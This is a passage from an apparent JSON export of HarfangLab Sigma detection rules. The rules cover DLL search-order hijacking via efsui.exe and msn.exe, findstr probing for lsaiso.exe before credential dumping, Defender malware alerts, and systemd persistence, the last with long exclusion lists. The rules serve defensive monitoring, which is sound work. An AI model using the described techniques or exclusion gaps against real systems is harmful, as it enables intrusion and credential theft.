ProcessOriginalFileName: 'efsui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.dll'\n - '\\EFSADU.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\USERENV.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76a53c24-d9cc-4c99-92e0-6e30c597bd9e",
"rule_name": "DLL Hijacking via efsui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via efsui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76c6673a-5139-46cf-af13-156a408b9b42",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605276Z",
"creation_date": "2026-03-23T11:45:34.605280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605287Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround",
"https://teamhydra.blog/2020/08/25/bypassing-credential-guard/",
"https://notes.qazeer.io/red-team-specifics/edr_bypass_with_edrsandblast#credential-guard-bypass",
"https://attack.mitre.org/techniques/T1057/"
],
"name": "t1057_lsaiso_discovery_via_findstr.yml",
"content": "title: LSASS Virtualization Status Discovered via Findstr\nid: 76c6673a-5139-46cf-af13-156a408b9b42\ndescription: |\n Detects potential reconnaissance activity targeting LSASS virtualization status through findstr commands searching for the \"lsaiso.exe\" process.\n The \"lsaiso.exe\" process indicates that LSASS (Local Security Authority Subsystem Service) is running in an isolated/virtualized environment as part of Windows security features like LSA Protection or Credential Guard.\n Attackers commonly perform this reconnaissance to determine if credential dumping techniques will be effective, as virtualized LSASS implementations provide enhanced protection against memory-based credential extraction attacks.\n It is recommended to investigate the source of these commands, review surrounding process activity for additional reconnaissance or credential access attempts, and verify that LSASS protection mechanisms are properly configured and functioning as expected.\nreferences:\n - https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround\n - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/\n - https://notes.qazeer.io/red-team-specifics/edr_bypass_with_edrsandblast#credential-guard-bypass\n - https://attack.mitre.org/techniques/T1057/\ndate: 2025/07/12\nmodified: 2025/07/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1057\n - attack.t1518\n - attack.s0057\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'lsaiso'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76c6673a-5139-46cf-af13-156a408b9b42",
"rule_name": "LSASS Virtualization Status Discovered via Findstr",
"rule_description": "Detects potential reconnaissance activity targeting LSASS virtualization status through findstr commands searching for the \"lsaiso.exe\" process.\nThe \"lsaiso.exe\" process indicates that LSASS (Local Security Authority Subsystem Service) is running in an isolated/virtualized environment as part of Windows security features like LSA Protection or Credential Guard.\nAttackers commonly perform this reconnaissance to determine if credential dumping techniques will be effective, as virtualized LSASS implementations provide enhanced protection against memory-based credential extraction attacks.\nIt is recommended to investigate the source of these commands, review surrounding process activity for additional reconnaissance or credential access attempts, and verify that LSASS protection mechanisms are properly configured and functioning as expected.\n",
"rule_creation_date": "2025-07-12",
"rule_modified_date": "2025-07-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1057",
"attack.t1518"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76dd270b-174a-47f7-9459-17314155c8cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608825Z",
"creation_date": "2026-03-23T11:45:34.608828Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608835Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide"
],
"name": "windows_defender_eventid_1116.yml",
"content": "title: Windows Defender has Detected Malware\nid: 76dd270b-174a-47f7-9459-17314155c8cb\ndescription: |\n Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\n It is recommended to investigate the origin and legitimacy of the detected file/process.\nreferences:\n - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\ndate: 2021/10/29\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.credential_access\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.Generic\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n service: defender\ndetection:\n selection:\n EventID: 1116\n Source: Microsoft-Windows-Windows Defender\n condition: selection\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76dd270b-174a-47f7-9459-17314155c8cb",
"rule_name": "Windows Defender has Detected Malware",
"rule_description": "Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\nIt is recommended to investigate the origin and legitimacy of the detected file/process.\n",
"rule_creation_date": "2021-10-29",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76e42c1b-d5a7-402e-927a-f2658e7b3622",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586369Z",
"creation_date": "2026-03-23T11:45:34.586372Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586380Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msn.yml",
"content": "title: DLL Hijacking via MSN.EXE\nid: 76e42c1b-d5a7-402e-927a-f2658e7b3622\ndescription: |\n Detects a potential Windows DLL search order hijacking via msn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/11/28\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msnmsgr.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msncore.dll'\n\n filter_signature:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n filter_location:\n ImageLoaded|endswith: '\\AppData\\Local\\Microsoft\\MSN\\msncore.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76e42c1b-d5a7-402e-927a-f2658e7b3622",
"rule_name": "DLL Hijacking via MSN.EXE",
"rule_description": "Detects a potential Windows DLL search order hijacking via msn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-11-28",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76f5d309-089f-432f-9c01-a5fd1570ea3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.697636Z",
"creation_date": "2026-03-23T11:45:34.612049Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612056Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/002/",
"https://attack.mitre.org/techniques/T1037/",
"https://attack.mitre.org/techniques/T1547/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1543_002_systemd_service_enabled.yml",
"content": "title: SystemD Service Enabled\nid: 76f5d309-089f-432f-9c01-a5fd1570ea3e\ndescription: |\n Detects when a service is manually enabled with SystemD.\n Enabled services are services that will be automatically started when the system reboots.\n Adversaries may create or modify systemd services to automatically execute malicious payloads each time the system boots as part of persistence.\n It is recommended to ensure that both a legitimate administrator enabled this service and that the service is not suspicious.\nreferences:\n - https://attack.mitre.org/techniques/T1543/002/\n - https://attack.mitre.org/techniques/T1037/\n - https://attack.mitre.org/techniques/T1547/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.002\n - attack.t1037\n - attack.t1547\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n - ' enable '\n - ' reenable '\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: 
'|/usr/bin/dpkg|/usr/bin/apt|'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? ?'\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/bin/snap'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_cybereason:\n CommandLine: '/bin/systemctl enable --now cbram'\n ParentImage: '/opt/cybereason/sensor/bin/cybereason-sensor'\n\n exclusion_edutice:\n CommandLine:\n - 'systemctl enable avahi-daemon.socket'\n - 'systemctl enable avahi-daemon.service'\n ParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_dracut:\n ProcessParentCommandLine|startswith:\n - '/bin/bash -p /bin/dracut '\n - '/bin/bash -p /usr/bin/dracut '\n - '/usr/bin/bash -p /bin/dracut '\n - '/usr/bin/bash -p /usr/bin/dracut '\n - '/usr/bin/bash -p /usr/sbin/dracut '\n - '/usr/bin/bash -p /sbin/dracut '\n\n exclusion_authconfig_nscd:\n CommandLine: '/bin/systemctl enable nscd.service'\n GrandparentCommandLine|startswith: '/usr/bin/python /sbin/authconfig '\n\n exclusion_amazon:\n CommandLine: 'systemctl enable amazon-cloudwatch-agent.service'\n ParentCommandLine|contains: '/opt/aws/amazon-cloudwatch-agent/bin/amazon-cloudwatch-agent-ctl'\n\n exclusion_kpatch:\n CommandLine: 
'systemctl enable kpatch.service'\n ParentCommandLine|startswith: '/usr/bin/bash /usr/sbin/kpatch '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_eset:\n - ProcessParentCommandLine:\n - '/bin/sh /opt/eset/efs/lib/enable_user_monitoring.sh'\n - '/bin/sh /opt/eset/efs/lib/install_scripts/register_service.sh'\n - ProcessCommandLine: 'systemctl enable eraagent.service'\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/????-????-????-????/agent_linux_x86_64.sh '\n - ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_puppet:\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessAncestors|contains: '|/opt/puppetlabs/puppet/bin/ruby|'\n\n exclusion_cfengine:\n - ParentImage|startswith: '/var/cfengine/'\n - ParentCommandLine|contains: '/var/cfengine/'\n\n exclusion_manageengine:\n ProcessParentImage: '/usr/local/manageengine/uems_agent/bin/dcservice'\n\n exclusion_freecad:\n ProcessGrandparentImage: '/usr/bin/AppImageLauncher'\n\n exclusion_containerd:\n ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_wapt:\n ProcessGrandparentImage:\n - '/opt/wapt/bin/python*'\n - '/opt/wapt/wapt-get.bin'\n\n exclusion_nslcd:\n ProcessCommandLine: '/bin/systemctl enable nslcd.service'\n ProcessGrandparentCommandLine: '/usr/bin/python /sbin/authconfig *'\n\n exclusion_rpm-tmp:\n ProcessParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? ?'\n\n exclusion_azure:\n - ProcessCommandLine:\n - systemctl enable azuremonitor-coreagent\n - systemctl enable azuremonitor-agentlauncher\n - systemctl enable azuremonitoragent\n ProcessGrandparentCommandLine: 'python? 
./agent.py -enable'\n - ProcessCurrentDirectory|startswith: '/var/lib/waagent/Microsoft.'\n\n exclusion_fsecure:\n ProcessAncestors|contains: '|/opt/f-secure/linuxsecurity/bootstrap/sbin/fsbootstrap|'\n\n exclusion_gpli:\n ProcessCommandLine:\n - 'systemctl enable glpi-agent'\n - '/usr/bin/systemctl enable glpi-agent'\n ProcessParentCommandLine:\n - 'sh -c systemctl enable glpi-agent 2>/dev/null >/dev/null'\n - '/tmp/.mount_glpi-*/usr/bin/perl /tmp/.mount_glpi-*/glpi-agent-appimage-hook --install *'\n\n exclusion_sekoia:\n ProcessCommandLine:\n - 'systemctl enable SEKOIAEndpointAgentWatchdog.service'\n - 'systemctl enable SEKOIAEndpointAgent.service'\n ProcessParentImage:\n - '/tmp/sekoia-agent.bin'\n - '/var/lib/endpoint-agent/downloads/agent-linux-v?.?.?'\n\n exclusion_nutanix:\n ProcessCommandLine: 'systemctl enable nutanix-move.service'\n ProcessParentCommandLine|contains:\n - 'sh /tmp/nutanix_move_*/*/nutanix_move.sh '\n - 'sh /var/tmp/nutanix_move_*/*/nutanix_move.sh '\n\n exclusion_pcsd:\n ProcessCommandLine:\n - '/usr/bin/systemctl enable corosync.service'\n - '/usr/bin/systemctl enable pacemaker.service'\n ProcessCurrentDirectory: '/var/lib/pcsd/'\n\n exclusion_udscan:\n ProcessAncestors|contains: '|/opt/microfocus/Discovery/.discagnt/udscan|'\n\n exclusion_bladelogic:\n ProcessGrandparentImage: '/opt/bladelogic/*/NSH/sbin/bldeploy'\n\n exclusion_insights_client:\n ProcessCommandLine: 'systemctl enable --now insights-client.timer'\n ProcessParentCommandLine|endswith: ' /usr/lib/python?.?/site-packages/insights_client/run.py --register'\n\n exclusion_docker:\n ProcessCommandLine:\n - 'systemctl enable docker'\n - 'systemctl enable docker.service'\n - 'systemctl enable --now docker'\n\n exclusion_cockpit:\n ProcessAncestors|contains: '|/usr/bin/cockpit-bridge|'\n\n exclusion_google:\n ProcessAncestors|contains: '|/usr/bin/google_metadata_script_runner|'\n\n exclusion_parentimage:\n ProcessParentImage:\n - '/opt/hurukai-agent/data/upgrade_x64.elf'\n - 
'/opt/TrendMicro/EndpointBasecamp/bin/tmxbc'\n - '/opt/dynatrace/oneagent/agent/lib64/oneagentosconfig'\n - '/usr/bin/gitlab-runner'\n - '/usr/bin/udevadm'\n - '/GRANGLE/appserver/jdk/*/bin/java'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76f5d309-089f-432f-9c01-a5fd1570ea3e",
"rule_name": "SystemD Service Enabled",
"rule_description": "Detects when a service is manually enabled with SystemD.\nEnabled services are services that will be automatically started when the system reboots.\nAdversaries may create or modify systemd services to automatically execute malicious payloads each time the system boots as part of persistence.\nIt is recommended to ensure that both a legitimate administrator enabled this service and that the service is not suspicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543.002",
"attack.t1547",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7720b1f7-b754-4828-9b33-cf1ea6a52a8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295311Z",
"creation_date": "2026-03-23T11:45:35.295315Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295322Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_dir.yml",
